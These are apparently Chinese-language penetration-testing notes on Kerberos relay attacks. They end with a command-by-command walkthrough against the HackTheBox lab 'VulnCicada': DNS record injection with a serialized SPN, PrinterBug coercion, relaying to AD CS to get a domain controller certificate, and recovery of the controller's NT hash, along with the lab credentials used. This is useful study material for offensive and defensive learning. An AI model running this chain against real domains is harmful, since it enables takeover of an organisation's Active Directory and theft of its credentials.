6.Kerberos Relay
https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
1. 利用
前置条件:
- 目标服务和客户端都不能强制执行加密或签名,因为我们没有执行这些操作所需的密钥(会话密钥),这与 NTLMRelay攻击类似
1.1. DCOM/RPC 本地激活
利用 DCOM 对象让系统向攻击者认证,需要有一台可以执行命令的域内机器
使用RemoteKrbRelay
#kerberos中继获取域控证书
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
#将base64格式的证书转换为文件
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
#使用证书进行认证
certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl
1.2. 序列化 SPN + DNS
通过注入序列化的SPN DNS记录,诱使目标发起kerberos认证,可以使得NTLM中继升级为Kerberos中继
添加DNS(但是要注意DNS的长度最大为63位字符、最小的序列化buffer长度为44位,)所以你的netbios_name长度最大为19位
netbios_name + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
# 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 由于DNS长度限制,此是最短的的序列化buffer
客户端会请求 cifs/netbios_name 的 Kerberos 票据,但确会连接到 netbios_name1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
例子: 使用krbrelayx进行中继
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
使用certipy
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.200.138
下面为AI的解释,
目标地址格式
│
├── IP 地址 (如 10.10.10.10)
│ └── ❌ 无法构造 SPN → 使用 NTLM
│
├── NetBIOS 名称 (如 DC01)
│ └── 尝试 Kerberos → 可能回落 NTLM
│
├── FQDN (如 dc01.domain.local)
│ └── 尝试 Kerberos (SPN: HOST/dc01.domain.local)
│ → 如果失败,回落 NTLM
│
└── 序列化 SPN 格式 (如 DC-JPQ2251UWhRC...)
└── ✅ 强制 Kerberos,不回落 NTLM